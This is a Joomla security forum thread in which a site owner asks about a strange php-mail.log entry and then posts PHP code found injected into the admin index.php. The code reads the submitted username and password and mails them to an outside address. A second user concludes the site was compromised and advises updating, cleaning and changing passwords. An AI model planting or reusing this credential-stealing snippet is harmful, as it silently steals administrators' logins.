Странный файл появляется- php-mail.log

Налаштування Joomla та серверу для безпечної роботи сайту. Взломи та хакерські ходи.
Elimelech
Користувач
Користувач
Повідомлень: 26
З нами з: 16 січня 2015, 12:22
Звідки: Украина

Странный файл появляется- php-mail.log

Повідомлення Elimelech » 27 квітня 2017, 21:27

При заходе в админку на сервер появляеться странный файл php-mail.log в папке .php со следующим содержанием:

Код: Виділити все

mail() on [/home/ru908887/domains/мой сайт/public_html/administrator/index.php:18]: To: xanalyzer@yahoo.com -- Headers:
Что это такое и откуда нои растут?
Спасибо за объяснения!

Аватар користувача
gruz
Користувач
Користувач
Повідомлень: 697
З нами з: 19 червня 2008, 18:09
Звідки: Прип'ять
Дякував (ла): 2 рази
Подякували: 26 рази

Странный файл появляется- php-mail.log

Повідомлення gruz » 27 квітня 2017, 23:32

- що за мило? Не твоє. Певно розробника? Якщо і не твоє, і не якогось розробника, то якогось хакера. Я гуглив його - нічого

А тестове мило відправляється з сайту? В глобальній конфігурації є така кнопочка.

php-mail.log - це корисний лог для визначення проблемних мейлів. Ліпше він хай з’являється, ніж не з’являється.

Там щось більше є в цьому лозі?

Це може бути відімкнена можливість з PHP відправляти мила. Хостери так інколи роблять.
Elimelech
Користувач
Користувач
Повідомлень: 26
З нами з: 16 січня 2015, 12:22
Звідки: Украина

Странный файл появляется- php-mail.log

Повідомлення Elimelech » 27 квітня 2017, 23:41

Це не моє мило і не розробника, мене вчора хтось ломанул и у файлі index.php ось таке знайшов:

Код: Виділити все

if (isset($_POST['username']))
{

$v1 = 'Username: '.$_POST['username'].' - Password: '.$_POST['passwd'];
@mail('xanalyzer@yahoo.com', 'Rabbi pwd', $v1);

}
Аватар користувача
gruz
Користувач
Користувач
Повідомлень: 697
З нами з: 19 червня 2008, 18:09
Звідки: Прип'ять
Дякував (ла): 2 рази
Подякували: 26 рази

Странный файл появляется- php-mail.log

Повідомлення gruz » 27 квітня 2017, 23:43

Ну значить тебе ломанули (-:
Треба оновлювати все, вичищати, міняти паролі тощо. Відповідь на твоє питання.


  • Similar Topics
    Відповіді
    Перегляди
    Останнє повідомлення

Повернутись до “Безпека сервера (хостингу) та сайту”

Хто зараз онлайн

Зараз переглядають цей форум: 0 і 0 гостей